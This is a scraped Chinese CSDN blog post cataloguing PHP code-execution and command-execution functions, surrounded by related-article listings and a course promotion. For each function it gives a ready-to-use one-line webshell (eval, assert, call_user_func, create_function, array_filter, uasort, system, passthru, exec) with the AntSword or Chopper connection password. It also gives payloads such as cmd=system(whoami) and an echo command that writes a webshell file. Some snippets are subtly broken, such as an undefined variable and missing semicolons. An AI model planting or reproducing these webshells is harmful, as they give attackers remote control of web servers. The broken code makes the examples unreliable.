PHP常见的命令执行函数与代码执行函数_php命令执行函数

最新推荐文章于 2024-06-20 23:57:10 发布
最新推荐文章于 2024-06-20 23:57:10 发布
阅读量267 收藏 5
点赞数 2
分类专栏: 资料作者\/ 是vip204888 文章标签: php android 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84254343/article/details/139816773
版权

5. array_map()

6. call_user_func_array()

7. array_filter()

​编辑

8. uasort()函数

9. preg_replace()

命令执行函数:

1. system()

2. passthru()

3. exec()

4. pcntl_exec()

5. shell_exec()

6. popen()/proc_open()

7. 反引号 ``

代码执行函数:

前提准备:火狐插件 Quantum  Hackbar (或者hackbar)      phpstudy

首先打开phpstudy  在phpstudy 下的www目录中创建一个1.php文件,接下来的实验均在1.php中进行。

注意:php代码中函数前加@意味着他会屏蔽掉出错信息,而不报错,避免通过错误回显来推测数据库结构,对其进行攻击。

1. eval()

命令执行:cmd=system(ipconfig);
蚁剑连接密码:cmd

 注意:eval要以分号结尾  传入的参数必须为php代码

<?php @eval($_POST['cmd']);?>
GET和POST传参的区别

这里用的是POST型传参   POST型传参通过request  body 传参   而GET型传参把参数包含在url中

可以使用

标签来使结果规范化

 <?php 
 echo "<pre>";
 echo eval($_POST["cmd"]);
 echo "</pre>";
 ?>

2. assert()

 命令执行:cmd=system(whoami)
    菜刀连接密码:cmd
 
<?php @assert($_POST['cmd']);?>

3. call_user_func()

传入的参数作为assert函数的参数
    命令执行:cmd=system(whoami)
    蚁剑连接密码:cmd
 
<?php call_user_func("assert",$_POST['cmd']); ?>
这里的  assert  是被调用的回调函数,其余为回调函数的参数。


<?php
call_user_func($_POST["dys"],$_POST["add"]);
?>
这里dys=assert;  add=phpinfo();

4. create_function()

创建匿名函数执行代码
执行命令和上传文件参考eval函数(必须加分号)。
<?php $func =create_function('',$_POST['cmd']);$func(); ?>

第一个变量表示定义一个函数变量部分  第二个变量表示执行的代码部分

5. array_map()

array_map() 函数
将用户自定义函数作用到数组中的每个值上,并返回用户自定义函数作用后的带有新值的数组。
回调函数接受的参数数目应该和传递给 array_map() 函数的数组数目一致。
    
<?php
    $func=$_GET['dys'];
    $cmd=$_POST['cmd'];
    $array[0]=$cmd;
    $new_array=array_map($dys,$array);
    echo $new_array;
?>

这个函数作用是为数组每个元素应用回调函数。

6. call_user_func_array()

将传入的参数作为数组的第一个值传递给assert函数
    cmd=system(phpinfo();)
   
<?php
    $cmd=$_POST['cmd'];
    $array[0]=$cmd;
    call_user_func_array("assert",$array);
?>

7. array_filter()

array_filter — 使用回调函数过滤数组的元素

<?php
    $cmd=$_POST['cmd'];
    $array1=array($cmd);
    $func =$_GET['dys'];
    array_filter($array1,$func);
?>
命令执行:cmd=whoami  dys=system

8. uasort()函数

uasort () 函数使用用户自定义的比较函数对数组排序,并保持索引关联(不为元素分配新的键)。 如果成功则返回 TRUE,否则返回 FALSE。

<?php
    uasort($_GET,'asse'.'rt');
?>

9. preg_replace()

preg_replace('正则规则','替换字符','目标字符')
执行命令和上传文件参考assert函数(不需要加分号)。
将目标字符中符合正则规则的字符替换为替换字符,此时如果正则规则中使用/e修饰符,则存在代码执行漏洞。
preg_replace("/test/e",$_POST["cmd"],"jutst test");

命令执行函数:

1. system()

蚁剑连接密码:cmd
<?php
echo "<pre>";
system($_POST["cmd"]);
?>

在POST命令框输入cmd=ipconfig  即可在页面出现信息

还可以用echo写入一句话木马,来进行连接

cmd=echo “<?php @eval($\_POST['dys']);?>” >> dys.php

2. passthru()

passthru — 执行外部程序并且显示原始输出

蚁剑连接密码:cmd
<?php
@passthru($_POST['cmd']);
?>

cmd=ipconfig 即可显示信息

3. exec()

这个函数有点特殊,他只输出最后一行

并且他的输出需要自己打印。(即用echo打印出来)

蚁剑连接密码:cmd
<?php
echo "<pre>"
echo exec($_POST['cmd']);
echo "</pre>"
?>

给大家的福利

零基础入门

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

同时每个成长路线对应的板块都有配套的视频提供:

在这里插入图片描述

因篇幅有限,仅展示部分资料

2401_84254343
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php assert执行命令,php代码执行&&命令执行函数
weixin_33603963的博客
03-19 2246
一、PHP代码执行函数1、eval()函数#传入的参数必须为PHP代码,既需要以分号结尾。#命令執行:cmd=system(whoami);#菜刀连接密码:cmd那么当我们上传了eval函数的菜刀马之后,在连接不上菜刀的情况下怎么上传大马呢?继续往下看这里我是先写一个上传马,再用上传马去上传大马,有点多次一举,但是考虑到大马代码量太多,还是建议先写个上传马,以下代码只有1kb。@$temp = $...
PHP执行代码函数有哪些,PHP代码执行函数总结
weixin_39586526的博客
03-24 1705
PHP中可以执行代码函数,常用于编写一句话***,可能导致代码执行漏洞,这里对代码执行函数做一些归纳。常见代码执行函数,如eval()、assert()、preg_replace()、create_function()array_map()、call_user_func()、call_user_func_array(),array_filter,usort,uasort()文件操作函数、动态函数...
PHP常见命令执行函数代码执行函数
dys的博客
06-23 5477
命令执行代码执行
PHP-代码执行函数-命令执行函数
weixin_47112073的博客
10-21 6184
简单写一下代码执行函数命令执行函数有哪些,并且说说他们的不同
PHP常见命令执行函数代码执行函数_php命令执行函数(1)
m0_60635283的博客
04-08 987
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!薪资区间6k-15k。**由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新**
PHP常见命令执行函数代码执行函数
热门推荐
→_→
10-22 1万+
参考: https://blog.csdn.net/weixin_43376075/article/details/105189017 https://blog.csdn.net/qq_43168364/article/details/105595532 https://www.cnblogs.com/-qing-/p/10819069.html 代码执行函数: 1- eval() #传入的参数必须为PHP代码,既需要以分号结尾。 #命令執行:cmd=system(whoami); #菜.
命令执行代码执行函数
浅笑996的博客
10-10 4227
命令执行函数 system () exec() shell_exec() passthru() popen() proc_popen() 代码执行函数 eval assert preg_replace call_user_func
PHP代码审计10—命令执行漏洞
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
08-04 1746
php命令执行基础与CTF例题分析
命令执行函数php
weixin_51692662的博客
08-19 1085
php,rce,命令执行函数
mysql执行系统命令函数_MySQL UDF提权执行系统命令
weixin_42305163的博客
01-19 1774
目录UDFUDF (user defined function),即用户自定义函数。是通过添加新函数,对MySQL的功能进行扩充,其实就像使用本地MySQL函数如user() 或 concat() 等。那么,我们该如何使用UDF呢?假设我的UDF文件名为 udf.dll,存放在MySQL安装目录的 lib/plugin 目录下。在 udf.dll 文件中,我定义了名为 sys_eval 的mys...
php外部执行命令函数用法小结
12-19
本文实例讲述了php外部执行命令函数用法。分享给大家供大家参考,具体如下: ...php的内置函数exec,system都可以调用系统命令(shell命令),但是,要想使用这二个函数php.ini中的安全模式必须关闭,要不然为了安全起见p
PHP执行linux命令常用函数汇总
10-22
一般情况下,很少会用php执行linux命令,不过特殊情况下,你也许会用到...以前我知道有二个函数可以执行linux命令,一个是exec,一个是shell_exec,通过本文给大家介绍PHP执行linux命令常用函数汇总,需要的朋友参考下
PHP执行linux命令6个函数代码实例
01-19
一般情况下,很少会用php执行linux命令,不过特殊情况下,你也许会用到这些函数。以前我知道有二个函数可以执行linux命令,一个是exec,一个是shell_exec。其实有很多的,结合手册内容,介绍以下6个函数。 1,exec...
深入解析PHP函数
NatLindsay的博客
06-17 415
PHP函数是一种重要的编程概念,它可以帮助开发者组织和管理代码,提高代码的可重用性和可维护性。在PHP中,函数可以完成各种任务,从简单的数学计算到复杂的数据库查询和数据处理。本文将从多个角度探讨PHP函数的应用,涵盖了函数的定义和调用、内置函数的使用、自定义函数的创建以及常见函数库。函数的参数:函数可以接受零个或多个参数,用于传递数据给函数内部使用。函数可以带有参数,用于接收输入,也可以返回值。函数命名:选择一个有意义的函数名,以便描述函数的功能。函数体:编写函数的具体实现代码,实现特定的功能。
ImageNet-1k 测试集 两大坑
weixin_42815846的博客
06-16 303
不然就会浪费一次提交机会,直接提交submission.txt就可以,注意每排5个预测结果,用于计算top5 error。2、用torchvision自带的imagenet dataset类加载进来的数据的类别标签,)但torchvision自动给你弄成。1、官方网站提交test set标签时,,但是他们的类别id不一样!以chickadee 山雀为例。这是torchvision的。他们的WNID都一样,
[极客大挑战 2020]Roamphp4-Rceme
最新发布
不会编程的崽的博客
06-20 195
右键源代码里给了提示,有备份文件index.php.swp,大伙都做到这来了,应该不用写了吧。加这个[~%FF]只是因为php7的解析方式,当然换成其他的也可以例如[~%EF] [~%CF]passthru(next(getallheaders()));然后,需要要绕过两层,多年rce经验,相信你一眼能看出。我们由内往外构造,这里需要前置知识(贴其他大佬的吧)知道原因可以在评论区踢我一脚。
1. NAS和SAN存储
u010198709的博客
06-13 557
流程:存储端共享裸块设备,客户端连接存储映射出sdx的虚拟硬盘,客户端分区格式化挂载使用。IQN名称格式: iqn.yyyy-mm.反域名:自定义名称。用户名:openfiler, 密码:password。磁盘接口:SATA,SAS、NVME。支持nfs、cifs协议共享存储空间。nfs:适用于Linux、Unix。类型:IP SAN、FC SAN。cifs:适用于Windows。磁盘类型:机械硬盘、SSD。基于文件系统级别的共享。DAS 直接附加存储。NAS 网络附加存储。SAN 存储区域网络。
k8s解决java服务下载超时问题
云深海阔专栏
06-18 174
我们在走ingress的java程序的时候,往往会有导出数据的功能,这个时候就会有因网络慢、后台处理时间过长导致下载超时,也有因下载文件太大,导致下载失败,综合解决办法如下。1)更改反向代理超时时间。
教育培训系统(FastAdmin+ThinkPHP+Unipp)
2401_84413757的博客
06-17 452
教育培训系统是一个集在线课程、学习资源、互动交流等功能于一体的综合性学习平台。它打破了传统教育的时空限制,让学习变得更加灵活自由。学员们可以根据自己的时间和需求,随时随地访问系统,选择感兴趣的课程进行学习。教育培训系统以其便捷的学习方式、丰富的资源和智能的评估功能,为我们的学习之路增添了色彩。让我们一起拥抱这个全新的学习平台,让学习变得更简单、更有趣!
php执行系统命令函数有哪些
06-03
PHP中,可以使用以下几个函数执行系统命令: ...需要注意的是,在使用这些函数执行系统命令时,需要格外小心,尤其是当需要将用户输入作为参数传递给这些函数时,需要进行适当的过滤和验证,以避免安全问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值